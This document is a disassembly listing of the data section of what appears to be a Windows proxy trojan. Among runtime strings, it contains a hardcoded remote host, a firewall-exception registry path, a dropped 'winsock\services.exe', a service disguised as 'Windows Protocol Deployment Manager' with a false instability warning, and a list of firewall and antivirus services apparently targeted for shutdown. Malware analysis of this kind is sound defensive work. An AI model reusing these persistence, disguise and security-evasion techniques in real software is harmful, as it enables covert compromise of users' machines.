asc_40D800 db 0Ah ; DATA XREF: sub_405D62:loc_405E72�o
db 0Ah,0
align 4
a___ db '...',0 ; DATA XREF: sub_405D62+E8�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_405D62+A3�o
align 10h
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_405D62+5B�o
db 0Ah
db 'Program: ',0
align 4
off_40D83C dd offset dword_4118A0 ; DATA XREF: sub_4060E5+D4�o
dd offset dword_4118F8
dword_40D844 dd 78696D2Eh, 747263h ; DATA XREF: sub_4061E9+42�o
aEncodepointer db 'EncodePointer',0 ; DATA XREF: sub_406255+4E�o
; sub_4063B2+37�o
align 4
aKernel32_dll db 'KERNEL32.DLL',0 ; DATA XREF: sub_406255:loc_406289�o
; sub_4062CC:loc_406300�o ...
align 4
aDecodepointer db 'DecodePointer',0 ; DATA XREF: sub_4062CC+4E�o
; sub_4063B2+4D�o
align 4
aFlsfree db 'FlsFree',0 ; DATA XREF: sub_406621+44�o
aFlssetvalue db 'FlsSetValue',0 ; DATA XREF: sub_406621+37�o
aFlsgetvalue db 'FlsGetValue',0 ; DATA XREF: sub_406621+2A�o
dword_40D89C dd 41736C46h ; DATA XREF: sub_406621+22�o
byte_40D8A0 db 6Ch ; DATA XREF: sub_406AC5+177�r
db 6Ch, 6Fh, 63h
align 8
aNull: ; DATA XREF: seg001:off_4107CC�o
unicode 0, <(null)>,0
align 4
aNull_0 db '(null)',0 ; DATA XREF: seg001:off_4107C8�o
align 10h
byte_40D8C0 db 6 ; DATA XREF: sub_406AC5:loc_406C4E�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38202800h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707800h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_407B1C+53�o
align 4
aKernel32_dll_0 db 'kernel32.dll',0 ; DATA XREF: sub_407B1C+44�o
align 8
dd 4030201h, 8070605h, 0C0B0A09h, 100F0E0Dh, 14131211h
dd 18171615h, 1C1B1A19h, 201F1E1Dh, 24232221h, 28272625h
dd 2C2B2A29h, 302F2E2Dh, 34333231h, 38373635h, 3C3B3A39h
dd 403F3E3Dh, 44434241h, 48474645h, 4C4B4A49h, 504F4E4Dh
dd 54535251h, 58575655h, 5C5B5A59h, 605F5E5Dh, 64636261h
dd 68676665h, 6C6B6A69h, 706F6E6Dh, 74737271h, 78777675h
dd 7C7B7A79h
db 7Dh, 7Eh, 7Fh
byte_40D9D7 db 0 ; DATA XREF: sub_408B89+1B�o
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: sub_409765+C2�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: sub_409765+AA�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_409765+6E�o
align 10h
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_409765+59�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_409765+43�o
aUser32_dll db 'USER32.DLL',0 ; DATA XREF: sub_409765+28�o
align 4
dd 86808006h, 808180h, 86031000h, 80828680h, 45050514h
dd 85854545h, 585h, 50803030h, 8008880h, 38272800h, 805750h
dd 30370007h, 88505030h, 20000000h, 80888028h, 80h
aHHhhXppwpp db '`h`hhh',8,8,7,'xppwpp',8,8,0
dw 800h
dd 7000800h, 8
dword_40DAA4 dd 41h dup(0) ; DATA XREF: sub_40AD4B+25�o
; sub_40B130+27�o
asc_40DBA8: ; DATA XREF: seg001:00410E78�o
; seg001:00411180�o
unicode 0, < ((((( H>
dw 10h
dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
dd 100010h, 200010h, 40h dup(0)
dword_40DDA8 dd 200000h, 4 dup(200020h), 280068h, 280028h, 200028h
; DATA XREF: seg001:00411184�o
; seg001:00410DA0�o
dd 8 dup(200020h), 480020h, 7 dup(100010h), 840010h, 4 dup(840084h)
dd 100084h, 3 dup(100010h), 3 dup(1810181h), 0Ah dup(1010101h)
dd 3 dup(100010h), 3 dup(1820182h), 0Ah dup(1020102h)
dd 2 dup(100010h), 10h dup(200020h), 480020h, 8 dup(100010h)
dd 140010h, 100014h, 2 dup(100010h), 100014h, 2 dup(100010h)
dd 1010010h, 0Bh dup(1010101h), 1010010h, 3 dup(1010101h)
dd 0Ch dup(1020102h), 1020010h, 3 dup(1020102h), 1010102h
dd 0
dword_40DFB0 dd 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h
dd 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h
dd 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h
dd 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh
dd 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h
dd 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h
dd 0FBFAF9F8h, 0FFFEFDFCh, 3020100h, 7060504h, 0B0A0908h
dd 0F0E0D0Ch, 13121110h, 17161514h, 1B1A1918h, 1F1E1D1Ch
dd 23222120h, 27262524h, 2B2A2928h, 2F2E2D2Ch, 33323130h
dd 37363534h, 3B3A3938h, 3F3E3D3Ch, 63626140h, 67666564h
dd 6B6A6968h, 6F6E6D6Ch, 73727170h, 77767574h, 5B7A7978h
dd 5F5E5D5Ch, 63626160h, 67666564h, 6B6A6968h, 6F6E6D6Ch
dd 73727170h, 77767574h, 7B7A7978h, 7F7E7D7Ch, 83828180h
dd 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h, 97969594h
dd 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h, 0ABAAA9A8h
dd 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h, 0BFBEBDBCh
dd 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h
dd 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h, 0E7E6E5E4h
dd 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h, 0FBFAF9F8h
dd 0FFFEFDFCh, 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch
dd 93929190h, 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h
dd 0A7A6A5A4h, 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h
dd 0BBBAB9B8h, 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h
dd 0CFCECDCCh, 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F7F6F5F4h, 0FBFAF9F8h, 0FFFEFDFCh, 3020100h, 7060504h
dd 0B0A0908h, 0F0E0D0Ch, 13121110h, 17161514h, 1B1A1918h
dd 1F1E1D1Ch, 23222120h, 27262524h, 2B2A2928h, 2F2E2D2Ch
dd 33323130h, 37363534h, 3B3A3938h, 3F3E3D3Ch, 43424140h
dd 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h, 57565554h
dd 5B5A5958h, 5F5E5D5Ch, 43424160h, 47464544h, 4B4A4948h
dd 4F4E4D4Ch, 53525150h, 57565554h, 7B5A5958h, 7F7E7D7Ch
dd 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h
dd 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h
dd 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h
dd 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh
dd 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h
dd 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h
dd 0FBFAF9F8h, 0FFFEFDFCh, 6D3A4848h, 73733A6Dh, 0
aDdddMmmmDdYyyy db 'dddd, MMMM dd, yyyy',0 ; DATA XREF: seg001:0041122C�o
aMmDdYy db 'MM/dd/yy',0 ; DATA XREF: seg001:00411228�o
align 4
aPm db 'PM',0 ; DATA XREF: seg001:00411224�o
align 10h
aAm db 'AM',0 ; DATA XREF: seg001:00411220�o
align 4
aDecember db 'December',0 ; DATA XREF: seg001:0041121C�o
align 10h
aNovember db 'November',0 ; DATA XREF: seg001:00411218�o
align 4
aOctober db 'October',0 ; DATA XREF: seg001:00411214�o
aSeptember db 'September',0 ; DATA XREF: seg001:00411210�o
align 10h
aAugust db 'August',0 ; DATA XREF: seg001:0041120C�o
align 4
aJuly db 'July',0 ; DATA XREF: seg001:00411208�o
align 10h
aJune db 'June',0 ; DATA XREF: seg001:00411204�o
align 4
aApril db 'April',0 ; DATA XREF: seg001:004111FC�o
align 10h
aMarch db 'March',0 ; DATA XREF: seg001:004111F8�o
align 4
aFebruary db 'February',0 ; DATA XREF: seg001:004111F4�o
align 4
aJanuary db 'January',0 ; DATA XREF: seg001:004111F0�o
aDec db 'Dec',0 ; DATA XREF: seg001:004111EC�o
aNov db 'Nov',0 ; DATA XREF: seg001:004111E8�o
aOct db 'Oct',0 ; DATA XREF: seg001:004111E4�o
aSep db 'Sep',0 ; DATA XREF: seg001:004111E0�o
aAug db 'Aug',0 ; DATA XREF: seg001:004111DC�o
aJul db 'Jul',0 ; DATA XREF: seg001:004111D8�o
aJun db 'Jun',0 ; DATA XREF: seg001:004111D4�o
aMay db 'May',0 ; DATA XREF: seg001:004111D0�o
; seg001:00411200�o
aApr db 'Apr',0 ; DATA XREF: seg001:004111CC�o
aMar db 'Mar',0 ; DATA XREF: seg001:004111C8�o
aFeb db 'Feb',0 ; DATA XREF: seg001:004111C4�o
aJan db 'Jan',0 ; DATA XREF: seg001:004111C0�o
aSaturday db 'Saturday',0 ; DATA XREF: seg001:004111BC�o
align 4
aFriday db 'Friday',0 ; DATA XREF: seg001:004111B8�o
align 10h
aThursday db 'Thursday',0 ; DATA XREF: seg001:004111B4�o
align 4
aWednesday db 'Wednesday',0 ; DATA XREF: seg001:004111B0�o
align 4
aTuesday db 'Tuesday',0 ; DATA XREF: seg001:004111AC�o
aMonday db 'Monday',0 ; DATA XREF: seg001:004111A8�o
align 4
aSunday db 'Sunday',0 ; DATA XREF: seg001:004111A4�o
align 10h
aSat db 'Sat',0 ; DATA XREF: seg001:004111A0�o
aFri db 'Fri',0 ; DATA XREF: seg001:0041119C�o
aThu db 'Thu',0 ; DATA XREF: seg001:00411198�o
aWed db 'Wed',0 ; DATA XREF: seg001:00411194�o
aTue db 'Tue',0 ; DATA XREF: seg001:00411190�o
aMon db 'Mon',0 ; DATA XREF: seg001:0041118C�o
aSun db 'Sun',0 ; DATA XREF: seg001:off_411188�o
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 4
aConout db 'CONOUT$',0 ; DATA XREF: sub_40C1B5+E�o
align 8
unicode 0, <H>,0
dd 0Eh dup(0)
dd offset dword_410440
dd offset dword_40E470
dd 3
dword_40E470 dd 4650h, 7EC8h, 0AC34h, 0 ; DATA XREF: seg001:0040E468�o
dword_40E480 dd 2 dup(0) ; DATA XREF: sub_40758F+2�o
; sub_40758F+7�o
dword_40E488 dd 2 dup(0) ; DATA XREF: sub_4075B3+2�o
; sub_4075B3+7�o
dword_40E490 dd 1F4Ch, 0 ; DATA XREF: sub_402040+14�o
dd 0FFFFFD9Ch, 0
dd 0FFFFFFFEh, 402E24h, 402E2Dh, 0
dword_40E4B0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_403AC8+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_403B0E
align 10h
dword_40E4D0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40405A+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4040B0
align 10h
dword_40E4F0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4043DD+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset loc_4044A7
align 10h
dword_40E510 dd 0FFFFFFFEh, 0 ; DATA XREF: seg001:00404B9D�o
dd 0FFFFFF80h, 0
dd 0FFFFFFFEh, 404D62h, 404D66h, 0FFFFFFFEh, 404D28h, 404D3Ch
dword_40E538 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40505E+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_405118
align 8
dword_40E558 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4063B2+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_406468
align 8
dword_40E578 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_406500+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 0
dd offset sub_406609
dd 0FFFFFFFEh, 0
dd offset sub_406615
dword_40E5A0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_407541+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_407577
align 10h
dword_40E5C0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_407680+5�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 407709h, 40771Dh, 0
dword_40E5E0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40773B+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40775Bh, 40775Fh, 0
dword_40E600 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40793E+2�o
dd 0FFFFFFC0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_407AAC
align 10h
dword_40E620 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_407B1C+2�o
db 0CCh
db 3 dup(0FFh)
align 10h
dd 0FFFFFFFEh, 407BA2h, 407BB9h, 0
dword_40E640 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_408199+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_408231
align 10h
dword_40E660 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_408490+2�o
db 0CCh
db 3 dup(0FFh)
align 10h
dd 0FFFFFFFEh, 0
dd offset sub_4085F1
align 10h
dword_40E680 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4088D8+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_408942
align 10h
dword_40E6A0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_409047+2�o
dd 0FFFFFF8Ch, 0
dd 0FFFFFFFEh, 409270h, 409274h, 0
dword_40E6C0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_409A8C+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 409AA9h, 409AC5h, 0
dword_40E6E0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_409CCB+2�o
db 0CCh
db 3 dup(0FFh)
align 10h
dd 0FFFFFFFEh, 0
dd offset sub_409DDA
align 10h
dword_40E700 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40A3AA+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40A47C
align 10h
dword_40E720 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40A965+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40A9F7
align 10h
dword_40E740 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B684+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40B77B
align 10h
dword_40E760 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B7A2+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40B8E0
align 10h
dword_40E780 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40BAAF+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40BB41
align 10h
dword_40E7A0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40BD5D+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40BDF3
align 10h
dword_40E7C0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40BEA0+2�o
db 0CCh
db 3 dup(0FFh)
align 10h
dd 0FFFFFFFEh, 0
dd offset sub_40BF71
dd 2 dup(0)
dd offset sub_40BF3D
dword_40E7E8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40C273+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40C2E4
align 8
dword_40E808 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40C2EF+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40C3C6
align 8
dword_40E828 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40C4C5+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40C588
off_40E844 dd offset dword_40D04C ; DATA XREF: seg002:0041CFB0�o
; ---------------------------------------------------------------------------
retn 40ECh
; ---------------------------------------------------------------------------
align 4
dd offset dword_40D1CC
dd offset aWs2_32_dll ; "WS2_32.dll"
dd offset dword_40D000
dd offset word_40EE46
dd offset dword_40D1C4
dd offset aPsapi_dll ; "PSAPI.DLL"
dd 2 dup(0)
dd 0E8A8h, 4 dup(0)
dd 0EA6Ch, 7Ch dup(0)
dd 80000073h, 80000011h, 80000014h, 80000003h, 80000010h
dd 80000013h, 80000001h, 8000000Dh, 8000000Ah, 80000004h
dd 8000006Fh, 80000009h, 80000015h, 80000002h, 80000012h
dd 80000097h, 8000000Bh, 80000034h, 80000017h, 0
dd 6C530000h, 706565h, 69570000h, 6578456Eh, 63h, 4D746547h
dd 6C75646Fh, 6C694665h, 6D614E65h, 4165h, 72430000h, 65746165h
dd 65726854h, 6461h, 65470000h, 72754374h, 746E6572h, 636F7250h
dd 49737365h, 64h, 74697845h, 636F7250h, 737365h, 6C430000h
dd 4865736Fh, 6C646E61h, 65h, 61657243h, 72506574h, 7365636Fh
dd 4173h, 6F430000h, 69467970h, 41656Ch, 72430000h, 65746165h
dd 65726944h, 726F7463h, 4179h, 65530000h, 72754374h, 746E6572h
dd 65726944h, 726F7463h, 4179h, 65440000h, 6574656Ch, 656C6946h
dd 41h, 636F7250h, 33737365h, 78654E32h, 74h, 74696157h
dd 53726F46h, 6C676E69h, 6A624F65h, 746365h, 65540000h
dd 6E696D72h, 50657461h, 65636F72h, 7373h, 704F0000h, 72506E65h
dd 7365636Fh, 73h, 636F7250h, 33737365h, 72694632h, 7473h
dd 72430000h, 65746165h, 6C6F6F54h, 706C6568h, 6E533233h
dd 68737061h, 746Fh, 65520000h, 65766F6Dh, 65726944h, 726F7463h
dd 4179h, 69460000h, 6C43646Eh, 65736Fh, 65470000h, 73614C74h
dd 72724574h, 726Fh, 65470000h, 6C694674h, 74744165h, 75626972h
dd 41736574h, 0
aFindnextfilea db 'FindNextFileA',0
align 4
aFindfirstfilea db 'FindFirstFileA',0
align 4
dd 65470000h, 6E695774h, 73776F64h, 65726944h, 726F7463h
dd 4179h, 6F4C0000h, 466C6163h, 656572h, 6F4C0000h, 416C6163h
dd 636F6C6Ch, 0
aLstrcpyna db 'lstrcpynA',0
align 4
aCreatemutexa db 'CreateMutexA',0
align 4
aSeterrormode db 'SetErrorMode',0
align 2
aKernel32_dll_1 db 'KERNEL32.dll',0
align 10h
aWs2_32_dll db 'WS2_32.dll',0 ; DATA XREF: seg001:0040E850�o
align 4
dd 65520000h, 6F6C4367h, 654B6573h, 79h, 53676552h, 61567465h
dd 4565756Ch, 4178h, 65520000h, 65704F67h, 79654B6Eh, 417845h
dd 75510000h, 53797265h, 69767265h, 6F436563h, 6769666Eh
dd 41h, 656C6544h, 65536574h, 63697672h, 65h, 746E6F43h
dd 536C6F72h, 69767265h, 6563h, 68430000h, 65676E61h, 76726553h
dd 43656369h, 69666E6Fh, 4167h, 704F0000h, 65536E65h, 63697672h
dd 4165h, 6C430000h, 5365736Fh, 69767265h, 61486563h, 656C646Eh
dd 0
aOpenscmanagera db 'OpenSCManagerA',0
align 4
dd 65520000h, 6C654467h, 56657465h, 65756C61h, 41h, 51676552h
dd 79726575h, 756C6156h, 41784565h, 0
aStartservicea db 'StartServiceA',0
align 4
aChangeservicec db 'ChangeServiceConfig2A',0
align 4
aCreateservicea db 'CreateServiceA',0
align 4
db 0
align 2
aSetservicestat db 'SetServiceStatus',0
align 4
db 0
align 2
aRegisterservic db 'RegisterServiceCtrlHandlerExA',0
dd 74530000h, 53747261h, 69767265h, 74436563h, 69446C72h
dd 74617073h, 72656863h
db 41h, 0
word_40EE46 dw 4441h ; DATA XREF: seg001:0040E858�o
db 56h ; V
db 41h, 50h, 49h
db 33h ; 3
db 32h, 2Eh, 64h
db 6Ch ; l
db 6Ch, 2 dup(0)
db 0
align 2
aGetmodulefilen db 'GetModuleFileNameExA',0
align 4
aPsapi_dll db 'PSAPI.DLL',0 ; DATA XREF: seg001:0040E860�o
align 4
aHeapalloc db 'HeapAlloc',0
align 4
aHeapfree db 'HeapFree',0
align 10h
aGetprocaddress db 'GetProcAddress',0
align 10h
dd 65470000h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 65470000h
dd 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 56746547h, 69737265h
dd 78456E6Fh, 41h, 50746547h, 65636F72h, 65487373h, 7061h
dd 65470000h, 61745374h, 70757472h, 6F666E49h, 41h, 43746547h
dd 65727275h, 7250746Eh, 7365636Fh, 73h, 61686E55h, 656C646Eh
dd 63784564h, 69747065h, 69466E6Fh, 7265746Ch, 0
aSetunhandledex db 'SetUnhandledExceptionFilter',0
dd 73490000h, 75626544h, 72656767h, 73657250h, 746E65h
dd 65440000h, 6574656Ch, 74697243h, 6C616369h, 74636553h
dd 6E6F69h, 654C0000h, 43657661h, 69746972h, 536C6163h
dd 69746365h, 6E6Fh, 6E450000h, 43726574h, 69746972h, 536C6163h
dd 69746365h, 6E6Fh, 69560000h, 61757472h, 6572466Ch, 65h
dd 74726956h, 416C6175h, 636F6C6Ch, 0
aHeaprealloc db 'HeapReAlloc',0
dd 65480000h, 65447061h, 6F727473h, 79h, 70616548h, 61657243h
dd 6574h, 72570000h, 46657469h, 656C69h, 65470000h, 64745374h
dd 646E6148h, 656Ch, 6C540000h, 74654773h, 756C6156h, 65h
dd 41736C54h, 636F6C6Ch, 0
aTlssetvalue db 'TlsSetValue',0
dd 6C540000h, 65724673h, 65h, 65746E49h, 636F6C72h, 4964656Bh
dd 6572636Eh, 746E656Dh, 0
aSetlasterror db 'SetLastError',0
align 4
aGetcurrentthre db 'GetCurrentThreadId',0
align 4
dd 6E490000h, 6C726574h, 656B636Fh, 63654464h, 656D6572h
dd 746Eh, 65470000h, 73795374h, 546D6574h, 41656D69h, 6C694673h
dd 6D695465h, 65h, 64616F4Ch, 7262694Ch, 41797261h, 0
aInitializecr_0 db 'InitializeCriticalSection',0
align 4
aRtlunwind db 'RtlUnwind',0
align 4
aGetcpinfo db 'GetCPInfo',0
align 10h
aGetacp db 'GetACP',0
align 4
dd 65470000h, 4D454F74h, 5043h, 73490000h, 696C6156h, 646F4364h
dd 67615065h, 65h, 65657246h, 69766E45h, 6D6E6F72h, 53746E65h
dd 6E697274h, 417367h, 65470000h, 766E4574h, 6E6F7269h
dd 746E656Dh, 69727453h, 73676Eh, 72460000h, 6E456565h
dd 6F726976h, 6E656D6Eh, 72745374h, 73676E69h, 57h, 65646957h
dd 72616843h, 754D6F54h, 4269746Ch, 657479h, 65470000h
dd 766E4574h, 6E6F7269h, 746E656Dh, 69727453h, 5773676Eh
dd 0
aSethandlecount db 'SetHandleCount',0
align 4
dd 65470000h, 6C694674h, 70795465h, 65h, 72657551h, 72655079h
dd 6D726F66h, 65636E61h, 6E756F43h, 726574h, 65470000h
dd 63695474h, 756F436Bh, 746Eh, 65530000h, 6C694674h, 696F5065h
dd 7265746Eh, 0
aGetconsolecp db 'GetConsoleCP',0
align 10h
aGetconsolemode db 'GetConsoleMode',0
align 10h
dd 65480000h, 69537061h, 657Ah, 754D0000h, 4269746Ch, 54657479h
dd 6469576Fh, 61684365h, 72h, 4C746547h, 6C61636Fh, 666E4965h
dd 416Fh, 434C0000h, 5370614Dh, 6E697274h, 4167h, 434C0000h
dd 5370614Dh, 6E697274h, 5767h, 65470000h, 72745374h, 54676E69h
dd 41657079h, 0
aGetstringtypew db 'GetStringTypeW',0
align 4
dd 65530000h, 64745374h, 646E6148h, 656Ch, 72570000h, 43657469h
dd 6F736E6Fh, 41656Ch, 65470000h, 6E6F4374h, 656C6F73h
dd 7074754Fh, 50437475h, 0
aWriteconsolew db 'WriteConsoleW',0
align 10h
aCreatefilea db 'CreateFileA',0
dd 6C460000h, 46687375h, 42656C69h, 65666675h, 7372h, 344h dup(0)
aInvalidInstanc db 'Invalid instance or socket',0 ; DATA XREF: seg001:00401008�o
align 4
aOperationSucce db 'Operation Success',0 ; DATA XREF: seg001:loc_40101D�o
align 10h
aUnableToResolv db 'Unable to resolve',0 ; DATA XREF: seg001:loc_401023�o
align 4
aUnableToConnec db 'Unable to connect',0 ; DATA XREF: seg001:loc_401029�o
align 4
aUnableToCreate db 'Unable to create socket',0 ; DATA XREF: seg001:loc_40102F�o
aUnableToBindSo db 'Unable to bind socket',0 ; DATA XREF: seg001:loc_401035�o
align 4
aPortIsInUse db 'Port is in use',0 ; DATA XREF: seg001:loc_40103B�o
align 4
aOperationPendi db 'Operation pending',0 ; DATA XREF: seg001:loc_401041�o
align 4
aUnknown db 'Unknown',0 ; DATA XREF: seg001:loc_401047�o
aHost238_hl556_ db 'host238.hl556.com',0 ; DATA XREF: sub_401E40+29�o
align 4
aD db '%d',0 ; DATA XREF: sub_401E40+4B�o
align 4
aHttp db 'http://',0 ; DATA XREF: sub_402040+3E9�o
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_402040+94A�o
aD_D_D_D_0 db '%d.%d.%d.%d',0 ; DATA XREF: sub_402040+A9D�o
aHttp1_0201Unab db 'HTTP/1.0 201 Unable to connect',0Dh,0Ah ; DATA XREF: sub_402040+CF1�o
db 'Proxy-agent: MSP/1.0',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHttp1_0200Conn db 'HTTP/1.0 200 Connection established',0Dh,0Ah
; DATA XREF: sub_402040+C38�o
db 'Proxy-agent: MSP/1.0',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\Firewal'
; DATA XREF: sub_402E60+1F�o
db 'lPolicy\StandardProfile\AuthorizedApplications\List',0
align 10h
aMicrosoftRWind db 'Microsoft (R) Windows Protocol Deployment Manager',0
; DATA XREF: sub_402E60+47�o
align 4
aSEnabledS db '%s:*:Enabled:%s',0 ; DATA XREF: sub_402E60+54�o
aSS db '%s\%s',0 ; DATA XREF: sub_402F20+3B�o
align 4
aS db '%s\*',0 ; DATA XREF: sub_403150+1F�o
align 4
aSS_0 db '%s\%s',0 ; DATA XREF: sub_403150+81�o
align 4
aSWinsockServic db '%s\winsock\services.exe',0 ; DATA XREF: seg001:004032A8�o
aWinsock db 'winsock',0 ; DATA XREF: seg001:0040350E�o
aWindowsProtoco db 'Windows Protocol Deployment Manager',0 ; DATA XREF: sub_403540+65�o
aProvidesImplem db 'Provides implementation support for third party network protocols'
; DATA XREF: sub_403540+B2�o
db '. Stopping or disabling this service will result in system insta'
db 'bility.',0
align 4
aPdm_0 db 'PDM',0 ; DATA XREF: seg001:00403808�o
aCaisafe db 'CAISafe',0 ; DATA XREF: sub_4036D0�o
aUmxcfg db 'UmxCfg',0 ; DATA XREF: sub_4036D0+A�o
align 10h
aUmxagent db 'UmxAgent',0 ; DATA XREF: sub_4036D0+14�o
align 4
aKpf4 db 'KPF4',0 ; DATA XREF: sub_4036D0+1E�o
align 4
aWebrootfirewal db 'WebrootFirewall',0 ; DATA XREF: sub_4036D0+28�o
aWinroute db 'WinRoute',0 ; DATA XREF: sub_4036D0+32�o
align 10h
aAvgfwsrv db 'AVGFwSrv',0 ; DATA XREF: sub_4036D0+3C�o
align 4
aAvg7alrt db 'Avg7Alrt',0 ; DATA XREF: sub_4036D0+46�o
align 4
aOutpostfirewal db 'OutpostFirewall',0 ; DATA XREF: sub_4036D0+50�o
aLavasoftfirewa db 'LavasoftFirewall',0 ; DATA XREF: sub_4036D0+5A�o
align 4
aMpfservice db 'MpfService',0 ; DATA XREF: sub_4036D0+64�o
align 4
aVsmon db 'vsmon',0 ; DATA XREF: sub_4036D0+6E�o
align 10h
aNpfmntor db 'NPFMntor',0 ; DATA XREF: sub_4036D0+78�o
align 4
